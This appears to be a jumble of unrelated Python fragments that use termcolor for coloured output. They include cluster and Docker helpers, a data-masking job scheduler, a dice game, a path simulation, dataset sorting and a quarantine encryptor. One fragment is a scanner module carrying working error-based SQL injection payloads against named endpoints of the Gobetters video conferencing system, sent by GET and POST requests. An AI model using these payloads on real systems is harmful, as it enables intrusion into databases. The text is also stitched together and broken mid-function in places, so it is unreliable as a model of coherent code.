    cprint("[" + self.hostname + "]: pull docker image in parallel.", self.__output_color)
    self.parallel_run(['sudo'] + self.__docker.get_docker_img(), nodes)
def run(self):
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
    }
    payloads = [
        "/web/seeserver.php?machineid=1'AND (SELECT 6632 FROM(SELECT COUNT(*),CONCAT(0xc,(MID((IFNULL(CAST(Md5(1234) AS CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '1'='1",
        "/web/department/deptsave.php?deptid=1 AND (SELECT 3593 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(Md5(1234) AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&ac=del&level=0&parentid=0&dm=root",
        "/web/android/dept.php?lan=1&deptcode=1'AND (SELECT 7173 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(Md5(1234) AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '1'='1",
        "/web/c/index.php?deptcode=1'AND (SELECT 7173 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(Md5(1234) AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '1'='1",
        "/web/onelanding/onelanding.php?username=1&deptcode=1'AND (SELECT 7173 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(Md5(1234) AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '1'='1",
        "/web/systemconfig/guangbo.php?id=12 AND (SELECT 5848 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(Md5(1234) AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&action=del&page=",
        "/web/device/dept.php?deptcode=1'AND (SELECT 7173 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(Md5(1234) AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '1'='1",
        "/web/users/depttree.php?deptid=-7276 OR ROW(1355,6771)>(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM (SELECT 8443 UNION SELECT 5201 UNION SELECT 3389 UNION SELECT 2860)a GROUP BY x)",
        ""
    ]
    try:
        for payload in payloads:
            vulnurl = self.url + payload
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+] Gobetters video conferencing system SQL injection found... (high risk)\tpayload: " + vulnurl, "red")
                return True, vulnurl, "Gobetters video conferencing system SQL injection", payload, req.text

        vulnurl = self.url + "/web/users/usersave.php"
        post_data = {
            "from": "123",
            "deptid": "0",
            "deptname": "123",
            "userid": "1 AND (SELECT 7173 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(Md5(1234) AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)",
            "level": "123",
            "username": "******",
            "realname": "admin",
            "userpass": "******",
            "sex": "1",  # the original dict repeated this key; duplicates collapse anyway
            "email": "*****@*****.**",
            "mobile": "123",
            "telephone": "123",
            "roleid": "0"
        }
        req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
        if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
            cprint("[+] Gobetters video conferencing system SQL injection found... (high risk)\tpayload: " + vulnurl + "\npost: " + json.dumps(post_data, indent=4), "red")
            return True, vulnurl, "Gobetters video conferencing system SQL injection", str(post_data), req.text

        vulnurl = self.url + "/web/department/departmentsave.php"
        post_data = {
            "deptid": "1",
            "deptcode": "1",
            "deptlogo": "1'AND (SELECT 7173 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(Md5(1234) AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '1'='1",
            "deptdesc": "1"
        }
        req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
        if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
            cprint("[+] Gobetters video conferencing system SQL injection found... (high risk)\tpayload: " + vulnurl + "\npost: " + json.dumps(post_data, indent=4), "red")
            return True, vulnurl, "Gobetters video conferencing system SQL injection", str(post_data), req.text

        vulnurl = self.url + "/web/monitor/monitormentsave.php"
        post_data = {
            "deptid": "1",
            "deptcode": "1",
            "deptlogo": "1'AND (SELECT 8709 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(Md5(1234) AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '1'='1",
            "deptdesc": "1"
        }
        req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
        if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
            cprint("[+] Gobetters video conferencing system SQL injection found... (high risk)\tpayload: " + vulnurl + "\npost: " + json.dumps(post_data, indent=4), "red")
            return True, vulnurl, "Gobetters video conferencing system SQL injection", str(post_data), req.text

        vulnurl = self.url + "/web/users/result.php"
        post_data = {
            "username": "******"
        }
        req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
        if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
            cprint("[+] Gobetters video conferencing system SQL injection found... (high risk)\tpayload: " + vulnurl + "\npost: " + json.dumps(post_data, indent=4), "red")
            return True, vulnurl, "Gobetters video conferencing system SQL injection", str(post_data), req.text
        else:
            cprint("[-] gobetters_multi_sqli vulnerability not found", "white", "on_grey")
            return False, None, None, None, None
    except:
        cprint("[-] " + __file__ + " ====> vulnerability probably not present", "cyan")
        return False, None, None, None, None
" --> " + dest + ".", self.__output_color) self.run(['sudo'] + self.__docker.copy_file(src, dest)) self.run(['sudo'] + self.__docker.update_file_ownership(dest)) def docker_copy_file_out(self, src, dest): cprint( "[" + self.hostname + "][Docker]: copy file from docker " + src + " --> " + dest + ".", self.__output_color) self.run(['sudo'] + self.__docker.copy_file_out(src, dest)) def docker_seq_run(self, exec_cmd, local_pfwd=[], remote_pfwd=[], async=False): cprint("[" + self.hostname + "][Docker]: run script:" + exec_cmd + ".", self.__output_color) self.run(['sudo'] + self.__docker.run([exec_cmd]), local_pfwd=local_pfwd, remote_pfwd=remote_pfwd, async=async) def docker_para_run(self, run_conf, exec_cmd, hostfile_path, local_pfwd=[], remote_pfwd=[], async=False): cprint( "[" + self.hostname + "][Docker]: run parallel script:" + exec_cmd + ".", self.__output_color)
cluster_hosts = []
cluster_hosts_sorted = sorted(cluster_hosts)
vm_vlan_tags = []

for c in clusters:
    if cSearch in c.name:
        cluster_name.append(c.name)
if not cluster_name:
    print("No clusters match your search.\n")

for c in clusters:
    for cl in cluster_name:
        if cl == c.name:
            print("-" * 80)
            cprint("Cluster Name: " + cl, 'red', attrs=['bold'])
            for h in c.host:
                f = si.content.customFieldsManager.field
                print(h.name)
                for k, v in [(x.name, v.value) for x in f for v in h.customValue if x.key == v.key]:
                    print("{}: {}".format(k, v))
                vm_vlan_tags.clear()
                for n in h.network:
                    try:
                        if 'DVUp' in n.name:
                            pass
                        else:
                            vm_vlan_tags.append(n.name.split('_')[1])
                    except:
                        pass
def read_configs(self):
    # on windows
    # os.system('color')
    #### self.pull_jobexeclist()
    engine_list = self.create_dictobj(self.enginelistfile)
    job_list = self.create_dictobj(self.joblistfile)
    jobexec_list = self.create_dictobj(self.jobexeclistfile)
    enginecpu_list = self.create_dictobj(self.enginecpulistfile)

    self.df_enginelist = pd.read_csv(self.enginelistfile)
    self.df_enginelist['totalgb'] = self.df_enginelist['totalgb'] * 1024
    self.df_enginelist['systemgb'] = self.df_enginelist['systemgb'] * 1024
    self.df_enginelist.rename(columns={'totalgb': 'totalmb', 'systemgb': 'systemmb'}, inplace=True)

    enginelist = []
    for engine in engine_list:
        engine_list_dict = collections.OrderedDict(
            ip_address=engine['ip_address'],
            totalmb=int(engine['totalgb']) * 1024,
            systemmb=int(engine['systemgb']) * 1024)
        enginelist.append(engine_list_dict)
    print_debug("engine_list:\n{}".format(engine_list))
    print_debug("enginelist:\n{}".format(enginelist))
    engine_list = enginelist

    if os.path.exists(self.enginecpulistfile):
        self.df_enginecpulist = pd.read_csv(self.enginecpulistfile)
        if self.df_enginecpulist.empty:
            self.df_enginecpulist['cpu'] = (100 - self.df_enginecpulist['cpu'])

    self.df_joblist = pd.read_csv(self.joblistfile)
    self.df_jobexeclist = pd.read_csv(self.jobexeclistfile)
    self.df_joblistunq = self.df_joblist.drop_duplicates(subset=[
        'jobid', 'jobname', 'jobmaxmemory', 'reservememory', 'environmentid',
        'environmentname'
    ], keep='first')

    job_requirement = self.df_joblistunq.query(
        "environmentname == @self.envname and jobid == @self.jobid")
    jobmaxmemory = job_requirement['jobmaxmemory'].values[0]
    reservememory = job_requirement['reservememory'].values[0]

    bannertext = banner()
    print(" ")
    print((colored(bannertext.banner_sl_box(text="Requirements:"), 'yellow')))
    print('  Jobid     = {}'.format(self.jobid))
    print('  Env       = {}'.format(self.envname))
    print('  MaxMB     = {} MB'.format(jobmaxmemory))
    print('  ReserveMB = {} MB'.format(reservememory))
    print('  Total     = {} MB'.format(jobmaxmemory + reservememory))

    if self.config.verbose or self.config.debug:
        print((colored(bannertext.banner_sl_box(text="Available Engine Pool:"), 'yellow')))
        print('{0:>1}{1:<35}{2:>20}{3:>20}'.format("", "Engine Name", "Total Memory(MB)", "System Memory(MB)"))
        for ind in self.df_enginelist.index:
            print('{0:>1}{1:<35}{2:>20}{3:>20}'.format(
                " ", self.df_enginelist['ip_address'][ind],
                self.df_enginelist['totalmb'][ind],
                self.df_enginelist['systemmb'][ind]))
        print((colored(bannertext.banner_sl_box(text="CPU Usage:"), 'yellow')))
        print('{0:>1}{1:<35}{2:>20}'.format("", "Engine Name", "Used CPU(%)"))
        for ind in enginecpu_list:
            print('{0:>1}{1:<35}{2:>20}'.format(" ", ind['ip_address'], ind['cpu']))

    engineusage = self.df_jobexeclist.query("jobstatus == 'RUNNING'").groupby(
        'ip_address')['jobmaxmemory'].sum().reset_index(name="totalusedmemory")
    if engineusage.empty:
        engineusage = pd.DataFrame()
        engineusage = self.df_enginelist[['ip_address']].copy()
        engineusage['totalusedmemory'] = 0

    print((colored(bannertext.banner_sl_box(text="Memory Usage:"), 'yellow')))
    print('{0:>1}{1:<35}{2:>20}'.format("", "Engine Name", "Used Memory(MB)"))
    for ind in engineusage.index:
        print('{0:>1}{1:<35}{2:>20}'.format(
            " ", engineusage['ip_address'][ind], engineusage['totalusedmemory'][ind]))
    # for ind in engineusage_od:
    #     print('{0:>1}{1:<35}{2:>20}'.format(" ", ind['ip_address'], ind['totalusedmemory']))

    if self.config.verbose or self.config.debug:
        print((colored(bannertext.banner_sl_box(text="Engine Current Usage:"), 'yellow')))
        print('{0:>1}{1:<35}{2:>20}{3:>20}'.format("", "Engine Name", "Used Memory(MB)", "Used CPU(%)"))
    if self.df_enginecpulist.empty:
        engineusage['cpu'] = 0
    else:
        engineusage = pd.merge(engineusage, self.df_enginecpulist,
                               on="ip_address", how="left").fillna(0)
    if self.config.verbose or self.config.debug:
        for ind in engineusage.index:
            print('{0:>1}{1:<35}{2:>20}{3:>20}'.format(
                " ", engineusage['ip_address'][ind],
                engineusage['totalusedmemory'][ind], engineusage['cpu'][ind]))

    if self.config.verbose or self.config.debug:
        print((colored(bannertext.banner_sl_box(text="Shortlisted Engines for running Job:"), 'yellow')))
        print('{0:>1}{1:<35}{2:>20}{3:>20}'.format("", "Engine Name", "Job ID", "Env Name"))
    engine_pool_for_job = self.df_joblist.query(
        "environmentname == @self.envname and jobid == @self.jobid")
    if self.config.verbose or self.config.debug:
        for ind in engine_pool_for_job.index:
            print('{0:>1}{1:<35}{2:>20}{3:>20}'.format(
                " ", engine_pool_for_job['ip_address'][ind],
                engine_pool_for_job['jobid'][ind],
                engine_pool_for_job['environmentname'][ind]))

    # print((colored(bannertext.banner_sl_box(text="Result:"), 'yellow')))
    jpd1 = pd.merge(engine_pool_for_job, self.df_enginelist, on="ip_address", how="left")
    jpd2 = pd.merge(jpd1, engineusage, on="ip_address", how="left").fillna(0)
    jpd2['availablemb'] = (jpd2['totalmb'] - jpd2['systemmb'] - jpd2['totalusedmemory']
                           - jobmaxmemory - reservememory)
    qualified_engines = jpd2.query("availablemb > 0")
    unqualified_engines = jpd2.query("availablemb < 1")

    if qualified_engines.empty:
        redcandidate = unqualified_engines.groupby(
            'ip_address')['availablemb'].max().reset_index(name="maxavailablememory")
        redcandidate['maxavailablememory'] = (redcandidate['maxavailablememory']
                                              + jobmaxmemory + reservememory)
        if self.df_enginecpulist.empty:
            redcandidatewithcpu = redcandidate
            redcandidate['cpu'] = 0
        else:
            redcandidatewithcpu = pd.merge(redcandidate, self.df_enginecpulist,
                                           on="ip_address", how="left").fillna(0)
        if self.config.verbose or self.config.debug:
            print((colored(bannertext.banner_sl_box(text="Red Engines:"), 'yellow')))
            print(colored(redcandidatewithcpu, 'red'))
        print(" All engines are busy. Running job# {} of environment {} may cause issues."
              .format(self.jobid, self.envname))
        print(" Existing jobs may complete after sometime and create additional capacity to execute new job.")
        print(" Please retry later.")
    else:
        if not unqualified_engines.empty:
            redcandidate = unqualified_engines.groupby(
                'ip_address')['availablemb'].max().reset_index(name="maxavailablememory")
            redcandidate['maxavailablememory'] = (redcandidate['maxavailablememory']
                                                  + jobmaxmemory + reservememory)
            if self.df_enginecpulist.empty:
                redcandidatewithcpu = redcandidate
                redcandidate['cpu'] = 0
            else:
                redcandidatewithcpu = pd.merge(redcandidate, self.df_enginecpulist,
                                               on="ip_address", how="left").fillna(0)
            if self.config.verbose or self.config.debug:
                print((colored(bannertext.banner_sl_box(text="Red Engines:"), 'yellow')))
                print(colored(redcandidatewithcpu, 'red'))

        bestcandidate = qualified_engines.groupby(
            'ip_address')['availablemb'].max().reset_index(name="maxavailablememory")
        if self.df_enginecpulist.empty:
            bestcandidatedetails = bestcandidate
            bestcandidatedetails['cpu'] = 0
        else:
            bestcandidatedetails = pd.merge(bestcandidate, self.df_enginecpulist,
                                            on="ip_address", how="left").fillna(0)
        if self.config.verbose or self.config.debug:
            print((colored(bannertext.banner_sl_box(text="Green Engines:"), 'yellow')))
            print(colored(bestcandidatedetails, 'green'))

        print((colored(bannertext.banner_sl_box(text="Best Candidate:"), 'yellow')))
        print(" ")
        win_engine = bestcandidatedetails.iloc[bestcandidatedetails['maxavailablememory'].idxmax()]
        engine_name = win_engine['ip_address']
        engine_mem = win_engine['maxavailablememory']
        engine_cpu = win_engine['cpu']
        print(colored(
            " Engine : {} , Available Memory : {} MB , Available CPU : {}% "
            .format(engine_name, engine_mem, engine_cpu),
            color='green', attrs=['reverse', 'blink', 'bold']))

        if self.run:
            apikey = self.get_auth_key(engine_name)
            # print(apikey)
            job_exec_response = self.exec_job(engine_name, apikey, self.jobid)
            if job_exec_response is not None:
                if job_exec_response['status'] == 'RUNNING':
                    executionId = job_exec_response['executionId']
                    # print(colored(" Execution of Masking job# {} with execution ID {} on Engine {} is in progress".format(self.jobid, executionId, engine_name), 'green'))
                    print_blue_on_white = lambda x: cprint(x, 'blue', 'on_white')
                    print_blue_on_white(
                        " Execution of Masking job# {} with execution ID {} on Engine {} is in progress"
                        .format(self.jobid, executionId, engine_name))
                else:
                    # print(colored(" Execution of Masking job# {} on Engine {} failed".format(self.jobid, engine_name), 'red'))
                    print_red_on_white = lambda x: cprint(x, 'red', 'on_white')
                    print_red_on_white(
                        " Execution of Masking job# {} on Engine {} failed"
                        .format(self.jobid, engine_name))
            else:
                print_red_on_white = lambda x: cprint(x, 'red', 'on_white')
                print_red_on_white(
                    " Execution of Masking job# {} on Engine {} failed"
                    .format(self.jobid, engine_name))
    print(" ")
print(f"-+-+-+- RONDA {i} -+-+-+-") valor = dado() print(f"Salió el: {valor}") go = True while go: print("Posiciones diponibles:") print(disp) jug = input("En qué casillero quieres ponerlo?: ") coor = jug.strip().lower() if coor not in pos_lugares: print(termcolor.colored("Posición inválida, intenta de nuevo.", "red")) else: if coor in used: print(termcolor.colored(f"Ya colocaste un número en la posición {coor}.", "red")) print(reminder) else: Player1.colocar(coor, valor) print(f"Pusiste un {valor} en la posición {coor}.") disp.remove(coor) used.append(coor) print("Tablero actual") Player1.print_tablero() go = False print("FIN DEL JUEGO\nContemos el puntaje...") print("Tablero final del jugador") Player1.print_tablero() Player1.p = contar_puntos(Player1.matriz) string = termcolor.cprint(f"El puntaje es {Player1.p}", "white" , "on_blue") print(string)
def single_turn(unittype, generated_map, CarSetting):
    walkables = all_walkable(generated_map)
    # print('walkables=', walkables, '#-# '*10)

    # set the random seed
    np.random.seed(456789)
    # draw 5 samples from a normal distribution with mean len(walkables)//20
    # and standard deviation 5, to simulate the battery level
    r = np.random.normal(loc=len(walkables) // 20, scale=5, size=5)
    simulate_battery_init = int(r[random.randint(0, 4)])
    print("normally distributed sample simulate_battery_init:", simulate_battery_init)

    s, e = None, None
    # simulate morning vs. evening
    if random.randint(0, 1) == 0:
        # simulate morning
        s = walkables[random.randint(0, len(walkables) - 1)]
        while s[2] != 2:
            s = walkables[random.randint(0, len(walkables) - 1)]
        e = walkables[random.randint(0, len(walkables) - 1)]
    else:
        # simulate evening: exactly the reverse
        e = walkables[random.randint(0, len(walkables) - 1)]
        while e[2] != 2:
            e = walkables[random.randint(0, len(walkables) - 1)]
        s = walkables[random.randint(0, len(walkables) - 1)]
    # more scenarios can be added by modifying the code above
    start_grid = Grid(s[0], s[1])
    end_grid = Grid(e[0], e[1])
    print("-" * 10, "run new simulation turn", "-" * 10, "\n")

    # set start and end points
    # start_grid = Grid(2, 1)
    # end_grid = Grid(2, 5)
    # if CarSetting.behavior_type == 0:
    #     s = walkables[random.randint(0, len(walkables)//2)]
    #     e = walkables[random.randint(len(walkables)//2, len(walkables)-1)]
    #     start_grid = Grid(s[0], s[1])
    #     end_grid = Grid(e[0], e[1])
    # if CarSetting.behavior_type == 1:
    #     s = walkables[random.randint(0, len(walkables)//2)]
    #     e = walkables[random.randint(len(walkables)//2, len(walkables)-1)]
    #     start_grid = Grid(s[0], s[1])
    #     if random.randint(0, 4) > 2:
    #         end_grid = Grid(parkings[unittype][0], parkings[unittype][1])
    #     else:
    #         end_grid = Grid(e[0], e[1])
    # if CarSetting.behavior_type == 2:
    #     s = walkables[random.randint(0, len(walkables)//2)]
    #     e = walkables[random.randint(len(walkables)//2, len(walkables)-1)]
    #     if random.randint(0, 4) > 2:
    #         start_grid = Grid(inners[unittype][0], inners[unittype][1])
    #     else:
    #         start_grid = Grid(s[0], s[1])
    #     end_grid = Grid(e[0], e[1])
    # if CarSetting.behavior_type == 3:
    #     s = walkables[random.randint(0, len(walkables)//3)]
    #     e = walkables[random.randint(len(walkables)//3, len(walkables)-1)]
    #     start_grid = Grid(s[0], s[1])
    #     end_grid = Grid(e[0], e[1])

    # search for a path to the destination block
    result_grid = mycar_walking(start_grid, end_grid, generated_map)

    # backtrack to recover the block path
    path = []
    while result_grid is not None:
        path.append(Grid(result_grid.x, result_grid.y))
        result_grid = result_grid.parent
    ALL_PATHS.append(path)

    abel_score = 0
    # print the map and the path; the path is drawn with asterisks
    for i in range(0, len(generated_map)):
        for j in range(0, len(generated_map[0])):
            if contain_grid(path, i, j):
                # star = colored('*', 'magenta', attrs=['reverse', 'blink'])
                # print(star + ", ", end="")
                cprint("*" + ", ", "green", attrs=["reverse", "blink"], end="")
                abel_score += 1
            else:
                if generated_map[i][j] == 1:
                    cprint("1" + ", ", "grey", attrs=["reverse", "blink"], end="")
                else:
                    print(str(generated_map[i][j]) + ", ", end="")
        print()
    print("abel_score=", abel_score)
    return abel_score
def print_seqs(seq_list):
    for i in range(0, len(seq_list)):
        termcolor.cprint(
            f"Sequence {i}: (Length: {seq_list[i].len()}) {seq_list[i]}", "blue")
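# print_seqs only needs objects exposing len() as a method plus __str__; a
# minimal hypothetical stand-in for trying the helper outside the full project:
class Seq:
    def __init__(self, strbases):
        self.strbases = strbases

    def len(self):
        return len(self.strbases)

    def __str__(self):
        return self.strbases

print_seqs([Seq("ACGT"), Seq("TTAACCGG")])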
import sys
from termcolor import colored, cprint

cprint('Hello, World!', 'cyan', attrs=['bold'])
print()
cprint("Attention!", 'red', file=sys.stderr)
            splits_file).exists() and (unsorted_path).is_dir():
        print("Sorting dataset...")
        print("Classes: {} ({})".format(get_classes(classes_file), classes_file))
        print("Splits: {} ({})".format(get_splits(splits_file)["Names"], splits_file))
        sort_dataset(get_splits(splits_file), get_classes(classes_file),
                     unsorted_path, out_path)
elif args.command == "package":
    if args.output is not None:
        out_path = pathlib.Path(args.output)
    if not args.no_changelog and not update_changelog(data_dir):
        cprint("Packaging dataset without adding a changelog message.", 'red')
    if args.update:
        print("Updating dataset information...")
        update_info(data_dir, verbose=False)
    print("Packaging dataset...")
    out_file = None
    if len(out_path.suffixes) == 0:
        out_path.mkdir(parents=True, exist_ok=True)
        dataset_name = "NULL"
        with open(info_file) as f:
            dataset_name = f.readline().split('\n')[0]
        out_file = out_path / ("{}-{}.zip".format(
            dataset_name, date.today().strftime("%Y-%m-%d")))
def spicy_file(path, filename, detection_type, arch, detected_as):
    if path is not None and filename is not None and detection_type is not None and detected_as is not None and arch is not None:
        full_path = "{}/{}".format(path, filename)
        cprint("[ !! ] THATS ONE SPICY MEATBALL, TRYING TO COOL IT DOWN [ !! ]", "blue", attrs=['dark', 'bold'])
        key = get_random_bytes(32)  # currently limited to 32 bytes, should be strong enough.
        nonce = get_random_bytes(24)  # max length for Nonce.
        try:
            if key is not None:
                from .db_create import insert_blob
                # Will upgrade to XChaCha_Poly1305 as its more secure than ChaCha20_poly1305
                cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce)
                # outfiles are stored under the name K-encryption-key__N-nonce__O-original-filename.cold
                outFile = '{}/quarantine/data/cold_files/K-{}__N-{}__O-{}.cold'.format(
                    HOME,
                    str(base64.urlsafe_b64encode(key).decode()),
                    str(base64.urlsafe_b64encode(nonce).decode()),
                    filename.replace(".", "_")
                )
                with open(full_path, "rb") as source, open(outFile, "wb") as dest:
                    # Note: the AEAD cipher object finalizes on its first digest, so
                    # encrypt_and_digest() raises TypeError on the second line of any
                    # multi-line file and control falls into the handler below.
                    for line in source.readlines():
                        # Tag is generated by the chacha20_poly1305 to verify data. we will be using this to verify
                        # any/all data encrypted by penne.
                        ct, tag = cipher.encrypt_and_digest(line)
                        dest.write(ct)
                a = input("Do we need to upload?")
                to_upload = {"APIKEY": check_prem()['API_KEY'], "Upload": False}
                if a.lower() == 'n':
                    pass
                else:
                    to_upload.update({'Upload': True})
                insert_blob(ct, outFile, path, filename, True, to_upload, nonce, key, tag, detected_as)
                return {
                    "Success": True,
                    "Encrypted": True,
                    "Uploaded": False,
                    "Key": "{}".format(base64.urlsafe_b64encode(key)),
                    "Nonce": "{}".format(base64.urlsafe_b64encode(nonce)),
                    "Tag": "{}".format(base64.urlsafe_b64encode(tag)),
                    "ColdFile": outFile,
                    "Original_File": filename,
                    "Found_where": path,
                    "DetectedAs": detection_type,
                    "Cold_Time": datetime.datetime.now(),
                    "Detection": detected_as
                }
            else:
                log.critical("Error when deriving key. The key could not be derived, "
                             "this is a critical error and the application cannot continue.")
                return {
                    "Success": False,
                    "Encrypted": False,
                    "Uploaded": False,
                    "Key": None,
                    "Nonce": None,
                    "ColdFile": None,
                    "Original_File": filename,
                    "Found_where": path,
                    "DetectedAs": detection_type,
                    "Cold_Time": datetime.datetime.now(),
                    "Detection": detected_as
                }
        except TypeError:
            log.critical("unable to encrypt file: {}".format("{}/{}".format(path, filename)))
            COMPLETED_RESULTS["unable_to_cold_store"].append("{}/{}".format(path, filename))
            return {
                "Success": False,
                "Encrypted": False,
                "Uploaded": False,
                "Key": None,
                "Nonce": None,
                "ColdFile": None,
                "Original_File": filename,
                "Found_where": path,
                "DetectedAs": detection_type,
                "Cold_Time": datetime.datetime.now(),
                "Detection": detected_as
            }
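# A minimal sketch of the same cold-storage idea without the per-line loop:
# PyCryptodome's AEAD ciphers finalize after the first digest, so a single
# encrypt_and_digest() over the whole file body is the safe pattern (the paths
# and key handling here are illustrative, not the project's own):
from Crypto.Cipher import ChaCha20_Poly1305
from Crypto.Random import get_random_bytes

def encrypt_whole_file(src_path, dest_path):
    key = get_random_bytes(32)
    nonce = get_random_bytes(24)  # a 24-byte nonce selects the XChaCha20 variant
    cipher = ChaCha20_Poly1305.new(key=key, nonce=nonce)
    with open(src_path, "rb") as source:
        ciphertext, tag = cipher.encrypt_and_digest(source.read())
    with open(dest_path, "wb") as dest:
        dest.write(ciphertext)
    return key, nonce, tag  # callers must keep all three to decrypt and verify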
def manage_list_view(lst, direction):
    global list_cursor_indx
    global start
    global end
    global col
    col, row = os.get_terminal_size()
    row -= 3
    remove_list_cursor(lst, list_cursor_indx)
    if direction == 0:
        list_cursor_indx -= 1
        if list_cursor_indx < start:
            start -= 1
            end = start + row
        if list_cursor_indx < 0:
            list_cursor_indx = len(lst) - 1
            start = len(lst) - row
            end = start + row
            if len(lst) < row:
                start = 0
                end = row
    else:
        list_cursor_indx += 1
        if list_cursor_indx >= end:
            end += 1
            start += 1
        if list_cursor_indx >= len(lst):
            list_cursor_indx = 0
            start = 0
            end = row
    add_list_cursor(lst, list_cursor_indx)
    os.system('clear')
    cprint('ID', 'red', end=' ', attrs=['bold'])
    cprint(' Name ', 'green', end=' ', attrs=['bold'])
    cprint('Class', 'magenta', end=' ', attrs=['bold'])
    cprint('Section', 'blue', end=' ', attrs=['bold'])
    cprint('Date of birth', 'yellow', end=' ', attrs=['bold'])
    cprint('Address', 'white', end=' ', attrs=['bold'])
    cprint('Phone ', 'cyan', attrs=['bold'])
    cprint('=' * col, 'red', attrs=['bold'])
    for i in lst[start:end]:
        a, b, c, d, e, f, g, h = i
        print(a, b, c, d, e, f, g, h)
# Assumes module-level helpers/state defined elsewhere in this project:
# Path (pathlib), pandas as pd, numpy as np, shutil, sys, cprint (termcolor),
# print_progress, count_entries, and `errors` (a list of note substrings that
# mark known bad segments).
def sort_dataset(splits, classes, unsorted_dir, out_dir):
    unsorted_path = Path(unsorted_dir)
    out_path = Path(out_dir)

    # Create directories for splits
    for split in splits["Names"]:
        (out_path / split).mkdir(parents=True, exist_ok=True)

    log_file = open(out_path / "sorting.log", mode="w+")
    classes_files = list(unsorted_path.glob("**/_classes.csv"))
    manual_classes = [
        k for k in classes_files
        if str(k.relative_to(unsorted_path).parent) in splits
    ]

    count = 0
    copied = 0
    skipped = 0
    total = count_entries(manual_classes)

    for csv in manual_classes:
        data = pd.read_csv(csv, dtype={'id': np.int32})
        # Directory with video segments corresponding to this csv file
        seg_dir = csv.parent / 'segments'
        # Set output root directory
        curr = str(csv.relative_to(unsorted_path).parent)
        if curr in splits:
            dest_dir = out_path / splits[curr] / curr
            dest_dir.mkdir(parents=True, exist_ok=True)
        curr_splits = 0
        # Create output directories for each class
        for c in classes:
            (dest_dir / c).mkdir(parents=True, exist_ok=True)
        # For each row of the manual classification file
        for row in data.itertuples():
            infile = seg_dir / "{:06d}.mp4".format(row.id)
            print_progress(count, total, end="")
            # If the notes column contains a known error type, skip
            if pd.notnull(row.notes) and any(x in row.notes for x in errors):
                cprint(" Skipped ({:06d}, {}, {}) ".format(
                    row.id, row.tag, row.notes), 'red', end="\r", flush=True)
                log_file.write(
                    "Skipped copying file {} with entry ({:06d}, {}, {}). "
                    "Reason: Matched a known error subclass.\n"
                    .format(infile, row.id, row.tag, row.notes))
                skipped += 1
            # If the notes column records a speaker change, start a new set there and skip
            elif pd.notnull(row.notes) and "Speaker Change" in row.notes:
                print("", end="\r")
                cprint(
                    "Found Speaker Change in file {} at {:06d}. Splitting data into new set."
                    .format(csv, row.id), 'blue', flush=True)
                curr_splits += 1
                curr = str(csv.relative_to(unsorted_path).parent) + "-" + str(curr_splits)
                dest_dir = dest_dir.parent / curr
                dest_dir.mkdir(parents=True, exist_ok=True)
                for c in classes:
                    (dest_dir / c).mkdir(parents=True, exist_ok=True)
                log_file.write(
                    "Split video dataset defined in {} at {} due to speaker change. New ID: {}\n"
                    .format(csv, row.id, curr))
                skipped += 1
            # If validation failed, skip
            elif pd.isnull(row.validated) or not row.validated:
                cprint(" Skipped ({:06d}, {}, {}) ".format(
                    row.id, row.tag, row.notes), 'red', end="\r", flush=True)
                log_file.write(
                    "Skipped copying file {} with entry ({:06d}, {}, {}). "
                    "Reason: Validation failure.\n"
                    .format(infile, row.id, row.tag, row.notes))
                skipped += 1
            # If the notes column is not null, show a message but copy anyway
            elif pd.notnull(row.notes):
                cprint(" Copying ({:06d}, {}, {}) ".format(
                    row.id, row.tag, row.notes), 'yellow', end="\r", flush=True)
                outfile = dest_dir / row.tag / "{:06d}.mp4".format(row.id)
                shutil.copy(str(infile), str(outfile))
                copied += 1
            # If the tag is a valid class name, copy the file to the output directory
            elif row.tag in classes:
                print(" Copying ({:06d}, {})... ".format(row.id, row.tag),
                      end="\r", flush=True)
